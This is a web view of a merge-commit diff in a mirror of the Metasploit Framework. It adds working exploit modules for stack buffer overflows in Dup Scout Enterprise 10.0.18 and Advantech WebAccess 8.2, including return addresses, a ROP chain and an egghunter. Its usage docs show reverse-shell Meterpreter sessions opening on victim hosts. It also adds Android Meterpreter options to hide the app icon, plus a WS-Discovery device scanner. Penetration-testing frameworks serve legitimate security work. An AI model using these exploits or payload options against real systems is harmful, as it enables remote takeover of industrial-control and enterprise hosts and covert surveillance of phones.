infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master'

MS-2855/keylogger-mettle-extension
Tod Beardsley 2017-12-12 14:48:58 -06:00
parent 61a8c2456d 6149f51273
commit f18f90e7e4
15 changed files with 610 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.16.22)
metasploit-framework (4.16.23)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -17,7 +17,7 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.18)
metasploit-payloads (= 1.3.19)
metasploit_data_models
metasploit_payloads-mettle (= 0.2.8)
msgpack
@ -138,7 +138,7 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.7.2)
grpc (1.7.3)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
@ -178,7 +178,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.18)
metasploit-payloads (1.3.19)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -193,7 +193,7 @@ GEM
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
msgpack (1.2.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)

34
documentation/modules/auxiliary/scanner/wsdd/wsdd_query.md Normal file
View File

@ -0,0 +1,34 @@
## Vulnerable Application
[Web Services Dynamic Discovery (WS-Discovery)](https://en.wikipedia.org/wiki/WS-Discovery) is a multicast discovery protocol utilising SOAP over UDP to locate web services on a local network.
Web service enabled devices typically include printers, scanners and file shares.
The reply from some devices may include optional vendor extensions. This data may include network information such as the device MAC address and hostname, or hardware information such as the serial number, make, and model.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/scanner/wsdd/wsdd_query`
3. Do: `set RHOSTS [IP]` (Default: `239.255.255.250`)
4. Do: `run`
## Scenarios
```
msf > use auxiliary/scanner/wsdd/wsdd_query
msf auxiliary(wsdd_query) > set rhosts 239.255.255.250
rhosts => 239.255.255.250
msf auxiliary(wsdd_query) > run
[*] Sending WS-Discovery probe to 1 hosts
[+] 10.1.1.184 responded with:
Address: http://10.1.1.184:3911/
Types: wsdp:Device, wprt:PrintDeviceType, wscn:ScanDeviceType, hpd:hpDevice
Vendor Extensions: {"HardwareAddress"=>"123456789ABC", "UUID"=>"12345678-1234-1234-abcd-123456789abc", "IPv4Address"=>"10.1.1.123", "Hostname"=>"HP09AAFB", "DeviceId"=>"MFG:HP;MDL:Photosmart 5520 series;DES:CX042A;", "DeviceIdentification"=>{"MakeAndModel"=>"Photosmart 5520 series", "MakeAndModelBase"=>"Photosmart 5520 series"}, "SerialNumber"=>"123456", "Services"=>" Print9100 SclScan RESTScan CIFS DOT4 LEDM", "AdapterType"=>"WifiEmbedded"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

47
documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md Normal file
View File

@ -0,0 +1,47 @@
## Vulnerable Application
Tested on Windows 10 x64
Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port.
[Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)
## Verification Steps
1. Install the application and set the option above to enable the web server
2. Start msfconsole
3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof```
5. Set options and payload
6. Do: ```run```
7. You should get a shell.
## Options
**RHOST**
IP address of the remote host running the server.
**RPORT**
Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options.
## Scenarios
To obtain a shell:
```
msf > use exploit/windows/http/dup_scout_enterprise_login_bof
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171
rhost => 192.168.1.171
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252
lhost => 192.168.1.252
msf exploit(windows/http/dup_scout_enterprise_login_bof) > run
[*] Started reverse TCP handler on 192.168.1.252:4444
[*] Generating exploit...
[*] Triggering the exploit now...
[*] Sending stage (179779 bytes) to 192.168.1.171
[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600
```

108
documentation/modules/exploit/windows/scada/advantech_webaccess_webvrpcs_bof.md Normal file
View File

@ -0,0 +1,108 @@
## Vulnerable Application
[Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)
## Vulnerability Analysis
The stack overflow happens in sub_10004BC8:
```
.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8 proc near ;
.text:10004BC8 ;
.text:10004BC8
.text:10004BC8 lpWindowName = dword ptr -818h
.text:10004BC8 hWnd = dword ptr -814h
.text:10004BC8 lpClassName = dword ptr -810h
.text:10004BC8 Args = dword ptr -80Ch
.text:10004BC8 lpBaseAddress = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest = byte ptr -800h
.text:10004BC8 Format = dword ptr 8
.text:10004BC8 arg_4 = byte ptr 0Ch
.text:10004BC8
.text:10004BC8 push ebp
.text:10004BC9 mov ebp, esp
.text:10004BCB sub esp, 818h
.text:10004BD1 mov [ebp+lpWindowName], offset aDebugScreen1 ; "Debug Screen1"
.text:10004BDB mov [ebp+lpClassName], offset aDebugwclass1 ; "debugWClass1"
.text:10004BE5 lea eax, [ebp+arg_4]
.text:10004BE8 mov [ebp+Args], eax
.text:10004BEE mov ecx, [ebp+Args]
.text:10004BF4 push ecx ; Args
.text:10004BF5 mov edx, [ebp+Format]
.text:10004BF8 push edx ; Format
.text:10004BF9 lea eax, [ebp+Dest]
.text:10004BFF push eax ; Dest
.text:10004C00 call ds:vsprintf ; overflow
```
The corresponding IDL is below:
```
[
uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
version(1.0)
]
interface target_interface
{
/* opcode: 0x01, address: 0x00401260 */
void sub_401260 (
[in] handle_t arg_1,
[in] long arg_2,
[in] long arg_3,
[in] long arg_4,
[in][ref][size_is(arg_4)] char * arg_5,
[out][ref] long * arg_6
);
}
```
## Verification Steps
1. Start `msfconsole`
2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set LHOST XXX.XXX.XXX.XXX`
5. `exploit`
6. **Verify** you get a connect back meterpreter
## Options
None.
## Scenarios
```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request
meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\WebAccess\Node>
```

2
documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md
View File

@ -4,7 +4,7 @@
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.
he software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).
## Verification Steps

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.16.22"
VERSION = "4.16.23"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

7
lib/msf/core/payload/android.rb
View File

@ -56,7 +56,12 @@ module Msf::Payload::Android
}
config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
config[0] = "\x01" if opts[:stageless]
flags = 0
flags |= 1 if opts[:stageless]
flags |= 2 if ds['AndroidMeterpreterDebug']
flags |= 4 if ds['AndroidWakelock']
flags |= 8 if ds['AndroidHideAppIcon']
config[0] = flags.chr
config
end

18
lib/msf/core/payload/android/payload_options.rb Normal file
View File

@ -0,0 +1,18 @@
# -*- coding: binary -*-
require 'msf/core'
module Msf::Payload::Android::PayloadOptions
def initialize(info = {})
super(info)
register_advanced_options(
[
Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]),
Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload" ]),
Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]),
]
)
end
end

2
lib/msf/core/payload/android/reverse_http.rb
View File

@ -2,6 +2,7 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/android/payload_options'
require 'msf/core/payload/uuid/options'
module Msf
@ -16,6 +17,7 @@ module Payload::Android::ReverseHttp
include Msf::Payload::TransportConfig
include Msf::Payload::Android
include Msf::Payload::Android::PayloadOptions
include Msf::Payload::UUID::Options
#

2
lib/msf/core/payload/android/reverse_tcp.rb
View File

@ -2,6 +2,7 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/android/payload_options'
module Msf
@ -15,6 +16,7 @@ module Payload::Android::ReverseTcp
include Msf::Payload::TransportConfig
include Msf::Payload::Android
include Msf::Payload::Android::PayloadOptions
#
# Generate the transport-specific configuration

2
metasploit-framework.gemspec
View File

@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.18'
spec.add_runtime_dependency 'metasploit-payloads', '1.3.19'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.8'
# Needed by msfgui and other rpc components

142
modules/auxiliary/scanner/wsdd/wsdd_query.rb Normal file
View File

@ -0,0 +1,142 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize
super(
'Name' => 'WS-Discovery Information Discovery',
'Description' => %q{
Discover information from Web Services Dynamic Discovery (WS-Discovery)
enabled systems.
},
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/bb513684(v=vs.85).aspx'],
['URL', 'http://specs.xmlsoap.org/ws/2005/04/discovery/ws-discovery.pd'],
['URL', 'https://en.wikipedia.org/wiki/Web_Services_for_Devices'],
['URL', 'https://en.wikipedia.org/wiki/WS-Discovery'],
['URL', 'https://en.wikipedia.org/wiki/Zero-configuration_networking#WS-Discovery']
]
)
register_options [
Opt::RPORT(3702),
OptAddressRange.new('RHOSTS', [true, 'The multicast address or CIDR range of targets to query', '239.255.255.250'])
]
end
def rport
datastore['RPORT']
end
def wsdd_probe
probe = '<?xml version="1.0" encoding="utf-8" ?>'
probe << '<soap:Envelope'
probe << ' xmlns:soap="http://www.w3.org/2003/05/soap-envelope"'
probe << ' xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"'
probe << ' xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"'
probe << ' xmlns:wsdp="http://schemas.xmlsoap.org/ws/2006/02/devprof">'
probe << '<soap:Header>'
# WS-Discovery
probe << '<wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To>'
# Action (Probe)
probe << "<wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</wsa:Action>"
# Message identifier (unique GUID)
probe << "<wsa:MessageID>urn:uuid:#{SecureRandom.uuid}</wsa:MessageID>"
probe << '</soap:Header>'
probe << '<soap:Body>'
probe << '<wsd:Probe/>' # WS-Discovery type (blank)
probe << '</soap:Body>'
probe << '</env:Envelope>'
probe
end
def scanner_prescan(batch)
print_status "Sending WS-Discovery probe to #{batch.length} hosts"
@results = {}
end
def scan_host(ip)
vprint_status "#{ip}:#{rport} - Sending WS-Discovery probe"
scanner_send wsdd_probe, ip, datastore['RPORT']
end
def scanner_postscan(_batch)
if @results.empty?
print_status 'No WS-Discovery endpoints found.'
return
end
found = {}
@results.each_pair do |ip, responses|
responses.uniq.each do |res|
found[ip] ||= {}
next if found[ip][res]
response_info = parse_wsdd_response res
if response_info.nil?
print_error "#{ip} responded with malformed data"
next
end
msg = []
msg << "Address: #{response_info['Address']}"
msg << "Types: #{response_info['Types'].to_s.split(/\s+/).join(', ')}"
msg << "Vendor Extensions: #{response_info['VendorExtension']}" unless response_info['VendorExtension'].nil?
print_good "#{ip} responded with:\n#{msg.join("\n")}"
report_service(host: ip, port: rport, proto: 'udp', name: 'wsdd', info: response_info)
found[ip][res] = true
end
end
end
def parse_wsdd_response(wsdd_res)
info = {}
# Validate ProbeMatches SOAP response contains a ProbeMatch
begin
soap = ::Nokogiri::XML wsdd_res
return nil if soap.xpath('//soap:Body//wsd:ProbeMatches//wsd:ProbeMatch').empty?
rescue
return nil
end
# Convert SOAP response to Hash
begin
res = Hash.from_xml wsdd_res
rescue REXML::ParseException
return nil
end
# Use the first ProbeMatch
probe_match = res['Envelope']['Body']['ProbeMatches'].first
return nil unless probe_match[0].eql? 'ProbeMatch'
return nil if probe_match[1].nil? || probe_match[1].empty?
match = probe_match[1]
# Device Address
info['Address'] = match['XAddrs'] || ''
# Device Types
info['Types'] = match['Types'] || ''
# Optional vendor extensions
unless match['VendorExtension'].nil? || match['VendorExtension'].empty?
info['VendorExtension'] = match['VendorExtension']
end
info
end
end

2
modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
View File

@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_error("Unable to login as #{user}")
return
end
store_valid_credential(user: username, private: password, proof: cookie)
store_valid_credential(user: user, private: password, proof: cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"

101
modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb Normal file
View File

@ -0,0 +1,101 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Dup Scout Enterprise
10.0.18. The buffer overflow exists via the web interface during
login. This gives NT AUTHORITY\SYSTEM access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'sickness' # Original discovery
],
'References' =>
[
[ 'EDB', '43145' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"
},
'Targets' =>
[
[ 'Dup Scout Enterprise 10.0.18',
{
'Ret' => 0x10090c83, # jmp esp - libspp.dll
'Offset' => 780
}
],
],
'Privileged' => true,
'DisclosureDate' => 'Nov 14 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
evil = rand_text(target['Offset'])
evil << [target.ret].pack('V')
evil << make_nops(12)
evil << payload.encoded
evil << make_nops(10000 - evil.length)
vprint_status("Evil length: " + evil.length.to_s)
sploit = "username="
sploit << evil
sploit << "&password="
sploit << rand_text(evil.length)
sploit << "\r\n"
print_status("Triggering the exploit now...")
res = send_request_cgi({
'uri' => '/login',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'content-length' => '17000',
'data' => sploit
})
handler
disconnect
end
end

141
modules/exploits/windows/scada/advantech_webaccess_webvrpcs_bof.rb Normal file
View File

@ -0,0 +1,141 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-938' ],
[ 'CVE', '2017-14016' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
{
'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
'Slide' => 0x07048f5b, # retn
'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04
}
],
],
'DisclosureDate' => 'Nov 02 2017',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(4592)])
end
def create_rop_chain()
# this target opts into dep
rop_gadgets =
[
0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
0x07024822, # & push esp # ret [BwPAlarm.dll]
0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
rand_text_alpha(4).unpack('V'),
rand_text_alpha(4).unpack('V'),
0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
0x90909090, # nop
0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# send the request to get the handle
resp = dcerpc.call(0x4, [0x02000000].pack('V'))
handle = resp.last(4).unpack('V').first
print_good("Got a handle: 0x%08x" % handle)
egg_options = { :eggtag => "0day" }
egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)
# apparently this is called a ret chain
overflow = [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Jmp']].pack('V')
overflow << [target['Ret']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << [target['Slide']].pack('V')
overflow << create_rop_chain()
overflow << egghunter
overflow << egg
overflow << rand_text_alpha(0x1000-overflow.length)
# sorry but I dont like msf's ndr class.
sploit = [handle].pack('V')
sploit << [0x000138bd].pack('V') # opcode we are attacking
sploit << [0x00001000].pack('V') # size to copy
sploit << [0x00001000].pack('V') # size of string
sploit << overflow
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0x1, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
ensure
disconnect
end
handler
end
end